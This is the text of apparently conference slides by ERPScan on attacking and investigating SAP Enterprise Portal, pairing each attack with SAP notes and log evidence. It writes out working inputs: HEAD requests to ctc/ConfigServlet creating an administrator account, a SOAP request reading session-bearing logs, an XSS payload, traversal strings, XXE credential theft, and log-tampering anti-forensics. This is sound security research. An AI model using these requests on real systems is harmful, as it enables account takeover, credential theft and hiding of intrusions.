sap portal: hacking and forensics€¦ · secure configuration and patch management disable them...

Invest in securityto secure investments

SAP Portal: Hacking and forensicsDmitry Chastukhin – Director of SAP pentest/research teamEvgeny Neyolov – Security analyst, (anti)forensics research

ERPScan

Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities

• Developing software for SAP security monitoring

• Talks at 35+ security conferences worldwide: BlackHat(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.

• First to develop software for NetWeaver J2EE assessment

• The only solution to assess all areas of SAP Security

• Research team with experience in different areas of securityfrom ERP and web security to mobile, embedded devices, andcritical infrastructure, accumulating their knowledge on SAPresearch.

2erpscan.com ERPScan — invest in security to secure investments

Dmitry Chastukhin

Business application security expert

Yet another security researcher


Agenda

• SAP security

• SAP forensics WTF?!

• Say hello to SAP Portal

• Breaking SAP Portal

• Catch me if you can

• Conclusion


SAP

• The most popular business application

• More than 180000 customers worldwide

• More than 70% of Forbes 500 run SAP

• More than 40% of ERP market in Poland


SAP security

Espionage• Stealing financial information• Stealing corporate secrets• Stealing supplier and customer lists• Stealing HR data

Fraud• False transactions• Modification of master data

Sabotage• Denial of service• Modification of financial reports• Access to technology network (SCADA) by trust relations


0

5

10

15

20

25

30

35

2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013

SAP security

• BlackHat

• Defcon

• HITB

• RSA

• CONFidence

• DeepSec

• Hacktivity

• Troopers

• Source

Source: SAP Security in Figures 2013

LINK


http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf


More than 2600 in total

How easy? SAP Security Notes

Is it remotely exploitable?

> 5000 non-web SAP services exposed in the worldincluding Dispatcher, Message server, SapHostControl, etc.


sapscan.com

What about other services?

0

1

2

3

4

5

6

7

8

9

SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Serverhttpd

World


What about unpublished threats?

• Companies are not interested in publishing information about their breaches

• There are a lot of internal breaches thanks to unnecessarily given authorizations (An employee by mistake buys hundreds of excavators instead of ten)

• There are known stories about backdoors left by developers in custom ABAP code

• How can you be sure that, if a breach occurs, you can find evidence?


If there are no attacks, it doesn’t mean anything

• Companies don’t like to share it

• Companies don’t use security audit ~10%

• Even if used, nobody manages it ~5%

• Even if managed, no correlation ~1%

SAP Forensics

erpscan.com 12ERPScan — invest in security to secure investments

Typical SAP audit options

• ICM log icm/HTTP/logging_0 70%

• Security audit log in ABAP 10%

• Table access logging rec/client 4%

• Message Server log ms/audit 2%

• SAP Gateway access log 2%

* The percentage of companies is based on our security assessments and product implementations.


What do we see?

• A lot of research

• Real attacks

• Lack of logging practice

• Many vulnerabilities are hard to close → We need to monitor them, at least


What do we need to monitor? External attacks on SAP

Attack users and SAP GUI

SAP Portal and WEB

Exposed SAP services

SAProuter

* Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas.

Awareness

Secure configuration and patch management

Disable them

•Too much issues and custom configuration•Can be 0-days•Need to concentrate on this area


• Point of web access

to SAP systems

• Point of web access to

other corporate systems

• Way for attackers

to get access to SAP

from the Internet

Say hello to Portal


EP architecture


Okay, okay. SAP Portal is important, and it has many links to other modules.

So what?


SAP Logging

erpscan.com 19

“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request(since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).“

SOURCE: SAP HELP

*Not the only…. There are many complex attacks with POST requests.

ERPScan — invest in security to secure investments

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm

SAP J2EE Logging

erpscan.com 20

• Categories of system events recording:– System – all system related security and administrative logs

– Applications – all system events related to business logic

– Performance – reserved for single activity tracing

• Default location of these files in your file system:\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\


SAP J2EE Logging

erpscan.com 21

• The developer trace files of the Java instance<SID>\<instance name>\work

• The developer trace files of the central services<SID>\<instance name>\work

<SID>\<instance name>\log

• Java server logs<SID>\<instance name>\j2ee\cluster\server<n>\log


•

Full logging is not always the best option


SAP Management Console



• SAP MMC: centralized system management

• SAP MMC has remote commands

• Commands are simple SOAP requests

• Allowing to see the trace and log messages

• It’s not bad if you only use it sometimes and delete logs after use, but…



erpscan.com 25

What can we find in logs?

Right!The file userinterface.log contains calculated JSESIONID

But…The attacker must have credentials to read the log file

WRONG!



<?xml version="1.0"?>

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xs="http://www.w3.org/2001/XMLSchema">

<SOAP-ENV:Header>

<sapsess:Session

xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">

<enableSession>true</enableSession>

</sapsess:Session>

</SOAP-ENV:Header>

<SOAP-ENV:Body>

<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">

<filename>j2ee/cluster/server0/log/system/userinterface.log</filename>

<filter/>

<language/>

<maxentries>%COUNT%</maxentries>

<statecookie>EOF</statecookie>

</ns1:ReadLogFile>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>


Prevention

LINK to SAP HELP

• Don’t use TRACE_LEVEL = 3

• Delete traces when work is finished

• Limit access to dangerous methods

• Install notes 927637 and 1439348

• Mask security-sensitive data in HTTP access log


http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm

Prevention

LINK to SAP HELP

erpscan.com 28

• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers

• By default, only for the headers listed below– Path Parameter: jsessionid

– Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword,ticket

– HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)


http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm

SAP NetWeaver J2EE


Access Control

• Web Dynpro - programmatic

• Portal iViews - programmatic

• J2EE Web apps - declarative


Programmatic

By UME

DeclarativeBy WEB.XML

Access Control

• The central entity in the J2EE authorization model is the security role

• Programmers define the application-specific roles in the J2EE deployment descriptor


web.xml web-j2ee-engine.xml

web.xml

<servlet>

<servlet-name>CriticalAction</servlet-name>

<servlet-class>com.sap.admin.Critical.Action</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>CriticalAction</</servlet-name>

<url-pattern>/admin/critical</url-pattern>

</servlet-mapping

<security-constraint>

<web-resource-collection>

<web-resource-name>Restrictedaccess</web-resource-name>

<url-pattern>/admin/*</url-pattern>

<http-method>GET</http-method>

</web-resource-collection>

<auth-constraint>

<role-name>administrator</role-name>

</auth-constraint>

</security-constraint>

Verb Tampering


Verb Tampering

• If we are trying to get access to an application using GET – we need a login:pass and administrator role

• What if we try to get access to application using HEAD instead GET?

• PROFIT!

• Did U know about ctc?


Verb Tampering

Need Admin account in SAP Portal?

Just send two HEAD requests

• Create new user CONF:idence

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;

CREATEUSER;USERNAME=CONF,PASSWORD=idence

• Add the user CONF to the group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;

ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators

* Works when UME uses JAVA database.


• Install SAP notes 1503579, 1616259, 1589525, 1624450

• Install other SAP notes about Verb Tampering • Scan applications with ERPScan WEB.XML

checker • Disable the applications that are not necessary

Prevention


Investigation


[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14

: GET /ctc/ConfigServlet HTTP/1.1 401 1790

[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14

: HEAD /ctc/ConfigServlet HTTP/1.1 200 0

[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14

: HEAD

/ctc/ConfigServlet?param=com.sap.ctc.util.Use

rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=ide

nce HTTP/1.0 200 0

j2ee\cluster\<node>\log\system\httpaccess\responses.trc

web.xml

<servlet><servlet-name>CriticalAction</servlet-name><servlet-class>com.sap.admin.Critical.Action</servlet-

class></servlet><servlet-mapping>

<servlet-name>CriticalAction</</servlet-name><url-pattern>/admin/critical</url-pattern>

</servlet-mapping<security-constraint><web-resource-collection><web-resource-name>Restrictedaccess</web-resource-name><url-pattern>/admin/*</url-pattern><http-method>GET</http-method><http-method>HEAD</http-method></web-resource-collection><auth-constraint>

<role-name>administrator</role-name></auth-constraint></security-constraint>

GET /admin/critical/CriticalAction

GET /servlet/com.sap.admin.Critical.Action

Invoker servlet


Invoker Servlet

• Want to execute an OS command on J2EE server remotely?

• Maybe upload a backdoor in a Java class?

• Or sniff all traffic?

Still remember ctc?


Invoker Servlet


Prevention


• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files with ERPScan WEBXML

checker

Investigation

erpscan.com 41

#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352

03#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa

p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA

Transaction :

[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A

pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut

il.SecurityAudit#Plain###Guest | USER.CREATE |

USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:

uniquename=[CONF]#

#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420

62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service

s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000

c29c26033#Thread[Thread-

50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.

sap.engine.services.security.roles.audit#Java###{0}:

Authorization check for caller assignment to J2EE security role

[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#


Investigation


XSS

• Many XSSs in Portal

• But sometimes HttpOnly

• But when we exploit XSS, we can use the features of SAP Portal


EPCF

EPCF

• EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework

• Enterprise Portal Client Manager (EPCM)

• iViews can access the EPCM object from every portal page or IFrame

• Every iView contains the EPCM object<SCRIPT>

alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");

</SCRIPT>


For example, EPCF used for transient user data buffer for iViews

Prevention

• Install SAP note 1656549


#Plain###192.168.192.26 : GET

/irj/servlet/prt/portal/prtroot/com.sap.porta

l.usermanagement.admin.UserMapping?systemid=M

S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(

%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#

j2ee\cluster\<node>\log\system\httpaccess\res

ponses.trc

Investigation


• Web Dynpro unauthorized modifications

• For example:– somebody steals an account using XSS/CSRF/Sniffing

– then tries to modify the severity level of logs

Web Dynpro JAVA


Web Dynpro JAVA

LINK to SAP HELP


http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm

• No traces of change in default log files

\cluster\server0\log\system\httpaccess\responses.log

• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log • But sometimes we can find information by indirect signs

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET

/webdynpro/resources/sap.com/tc~lm~webadmin~log_config

~wd/Components/com.sap.tc.log_configurator.LogConfigur

ator/warning.gif HTTP/1.1 200 110

• The client loaded images from the server during some changes

Investigation


Investigation


• Most actions have icons

• They have to be loaded from the server

• Usually, legitimate users have them all in cache

• Attackers usually don’t have them, so they make requests to the server

• That’s how we can identify potentially malicious actions

• But there should be correlation with a real user’s activity

• False positives are possible:– New legitimate user

– Old user clears cache

– Other

Directory traversal

FIX


Directory traversal fix bypass


Prevention


• Install SAP note 1630293

Investigation


/../

!252f..!252f

Breaking SAP Portal

• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB

• Found a file in the OS of SAP Portal with keys to decrypt passwords

• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys

• Decrypt passwords and log into Portal

• PROFIT!


Read the file

How can we read the file?

• Directory Traversal

• OS Command execution

• XML External Entity (XXE)


XXE in Portal: Details

erpscan.com 57

• Injection of malicious requests into XML packets

• Can lead to unauthorized file read, DoS, SSRF

• There is an XXE vulnerability in SAP Portal

• Can be exploited by modification of POST request

• It is possible to read any file from OS and much more


XXE in Portal


XXE

Error based XXE


XXE in Portal: Result

• We can read any file

• Including config with passwords

• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:

\usr\sap\<SID>\SYS\global\security\data\SecStore.properties


rdbms.maximum_connections=5

system.name=TTT

secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.key

secstorefs.secfile=/oracle/TTT/sapmnt/global/security/

data/SecStore.properties

secstorefs.lib=/oracle/TTTsapmnt/global/security/lib

rdbms.driverLocation=/oracle/client/10x_64/instantclie

nt/ojdbc14.jar

rdbms.connection=jdbc/pool/TTT

rdbms.initial_connections=1

Where are the passwords? (config.properties)



system.name=TTT


data/SecStore.key





nt/ojdbc14.jar



Where are the passwords? (config.properties)


$internal/version=Ni4zFF4wMSeaseforCCMxegAfx

admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu

eur2445yxgBS

admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq

Dp+QD04b0Fh

jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI

0VGegH

admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr

4ZUgRTQ

$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt

$internal/mode=encrypted

admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7

5eC6/5S3E

SecStore.properties

But where is the key?



system.name=TTT


data/SecStore.key





nt/ojdbc14.jar



config.properties


Get the password

• We have an encrypted password

• We have a key to decrypt it

We got the J2EE admin and JDBC login:password!


Prevention

erpscan.com 67

• Install SAP note 1619539• Restrict read access to files SecStore.propertiesand SecStore.key


Investigation

erpscan.com 68

POST

/irj/servlet/prt/portal/prteventname/HtmlbE

vent/prtroot/pcd!3aportal_content!2fadminis

trator!2fsuper_admin!2fsuper_admin_role!2fc

om.sap.portal.content_administration!2fcom.

sap.portal.content_admin_ws!2fcom.sap.km.Ad

minContent!2fcom.sap.km.AdminContentExplore

r!2fcom.sap.km.AdminExplorer/ HTTP/1.1


Investigation

• The only one way to get HTTP POST request values is to enable HTTP Trace

• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable• For 6.4 and 7.0 SP12 and lower:

– On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc

– On Server \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc

• For 7.0 SP13 and higher:/j2ee/cluster/dispatcher/log/services/http/req_resp.trc

• Manually analyze all requests for XXE attacks


Malicious file upload: Attack

• Knowledge management allows uploading to the server different types of files that can store malicious content

• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user

• For example, it can be an HTML file with JavaScript that steals cookies


Malicious file upload: Forensics

[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST

/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt

root/pcd!3aportal_content!2fspecialist!2fcontentman

ager!2fContentManager!2fcom.sap.km.ContentManager!2

fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc

Explorer!2fcom.sap.km.DocsExplorer/documents

HTTP/1.1 200 13968

[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET

/irj/go/km/docs/etc/public/mimes/images/html.gif

HTTP/1.1 200 165

*Again, images can help us.


Malicious file upload: Prevention

erpscan.com 74

Enable File Extension and Size Filter:• System Administration → System Configuration →

Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter

• Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter


Malicious file upload: Prevention

erpscan.com 75

Enable Malicious Script Filter:• System Administration → System Configuration →

Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter

• The filter also detects executable scripts in files that are being modified and encodes them when they are saved

– enable Forbidden Scripts. Comma-separated list of banned script tags that will be encoded when the filter is applied

– enable the Send E-Mail to Administrator option


Portal post-exploitation

• Lot of links to other systems in corporate LAN

• Using SSRF, attackers can get access to these systems

What is SSRF?


• We send Packet A to Service A

• Service A initiates Packet B to service B

• Services can be on the same or different hosts

• We can manipulate some fields of packet B within packet A

• Various SSRF attacks depend on how many fields we can control on packet B

SSRF History: Basics

Packet A

Packet B


Partial Remote SSRF: HTTP attacks on other services

HTTP Server Corporate network

Direct attack GET /vuln.jsp

SSRF Attack

SSRF Attack Get /vuln.jst

A B


Gopher uri scheme

• Using gopher:// uri scheme, it is possible to send TCP packets– Exploit OS vulnerabilities

– Exploit old SAP application vulnerabilities

– Bypass SAP security restrictions

– Exploit vulnerabilities in local services

More info in our BH2012 presentation:

SSRF vs. Business Critical Applications

LINK


http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf

Portal post-exploitation


Anti-forensics


Anti-forensics

• Flooding

• Deleting

• Changing


Anti-forensics

Log flooding

• 5 active logs

• Maximum log file size is 10 Mb

• Archiving when all logs reach the maximum size

• If file.0.log -> max size then open file.1.log

• If file.4.log -> max size then zip all and backup

• Rewriting the same files after archiving


Anti-forensics

Log deleting

• SAP locks write access to the only one active log

• SAP allows reading/writing logs, so it is possible to delete them

• It could compromise the attacker’s presence

Log changing

• SAP locks write access only to the one active log

• It is possible to write into any other log file


Securing SAP Portal

• Patching

• Secure configuration

• Enabling HTTP Trace with masking

• Malicious script filter

• Log archiving

• Additional place for log storage

• Monitoring of security events– Own scripts, parse common patterns

– ERPScan has all existing web vulns/0-day patterns


Conclusion

It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure

SAP Guides

It’s all in your hands

Regular security assessments

ABAP code review

Monitoring technical security

Segregation of Duties

Security events monitoring

Future work

I'd like to thank SAP's Product Security Response Team for thegreat cooperation to make SAP systems more secure. Researchis always ongoing, and we can't share all of it today. If you wantto be the first to see new attacks and demos, follow us at@erpscan and attend future presentations:

• July 31 – BlackHat (Las Vegas, USA)


Web: www.erpscan.come-mail: [email protected]

Twitter: @erpscan@_chipik@neyolov

sap portal: hacking and forensics€¦ · secure configuration and patch management disable them...

Documents